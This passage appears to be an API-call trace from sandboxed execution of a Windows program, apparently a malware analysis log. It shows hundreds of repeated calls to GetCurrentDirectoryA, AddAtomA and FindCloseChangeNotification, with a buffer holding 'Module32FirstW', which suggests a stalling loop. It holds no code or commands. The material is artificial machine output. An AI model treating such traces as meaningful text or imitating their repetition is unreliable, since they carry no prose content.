lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.937] AddAtomA (lpString=0x0) returned 0x0 [0120.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.937] AddAtomA (lpString=0x0) returned 0x0 [0120.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.937] AddAtomA (lpString=0x0) returned 0x0 [0120.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.937] AddAtomA (lpString=0x0) returned 0x0 [0120.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.937] AddAtomA (lpString=0x0) returned 0x0 [0120.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.938] AddAtomA (lpString=0x0) returned 0x0 [0120.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.939] AddAtomA (lpString=0x0) returned 0x0 [0120.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.940] AddAtomA (lpString=0x0) returned 0x0 [0120.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.941] AddAtomA (lpString=0x0) returned 0x0 [0120.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.942] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.943] AddAtomA (lpString=0x0) returned 0x0 [0120.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.944] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.945] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.946] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.947] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.948] AddAtomA (lpString=0x0) returned 0x0 [0120.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.949] AddAtomA (lpString=0x0) returned 0x0 [0120.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: 